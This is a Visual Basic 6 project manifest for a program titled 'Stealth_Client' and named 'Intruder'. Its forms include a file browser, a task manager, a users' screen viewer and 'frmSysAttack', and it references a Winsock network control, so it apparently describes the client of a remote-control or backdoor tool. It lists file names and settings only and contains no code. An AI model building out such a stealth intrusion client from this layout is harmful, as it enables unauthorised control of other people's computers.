Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\SYSTEM\STDOLE2.TLB#OLE Automation
Reference=*\G{515433AF-97E6-11D1-AE18-0060976BB3A1}#8.1#0#COMMON.DLL#Common
Reference=*\G{7BC3D316-1F67-11D3-85B5-D9B39838CD06}#1.0#0#..\DEV TOOLS\DEVTOOLDLL\DEVTOOLS.DLL#Devtools By Devtools@developit.demon.nl
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Object={3B7C8863-D78F-101B-B9B5-04021C009402}#1.2#0; RICHTX32.OCX
Object={831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCTL.OCX
Object={BDC217C8-ED16-11CD-956C-0000C04E4C0A}#1.1#0; TABCTL32.OCX
Object={6B7E6392-850A-101B-AFC0-4210102A8DA7}#1.3#0; comctl32.ocx
Form=frmFBrowser.frm
Module=modGlobals; mod_Globals.bas
Form=frmCopy.frm
Form=frmDirs.frm
Form=frmMove.frm
Form=frmEdit.frm
Form=frmSearch.frm
Form=frmHelp.frm
Module=modHelp; modHelp.bas
Form=frmClient.frm
Form=frmChooseConn.frm
Form=frmMsgType.frm
Form=frmSysAttack.frm
Form=frmPicWave.frm
Form=frmSetMail.frm
Form=frmWave.frm
Form=frmPing.frm
Form=frmResolution.frm
Module=modMenuEffects; modMenuEffects.bas
Form=frmTskManager.frm
Form=frmUsersScreen.frm
Form=frmGetText.frm
Form=frmSplash.frm
Form=frmConfig.frm
Class=ICMP; ICMP.cls
Module=mdlRegistry; Registry.bas
IconForm="frmClient"
Startup="Sub Main"
HelpFile=""
Title="Stealth_Client"
ExeName32="IntClient.exe"
Path32="..\..\..\..\WINNT\Profiles\Administrator\Desktop"
Command32=""
Name="Intruder"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="A gh0ul production"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
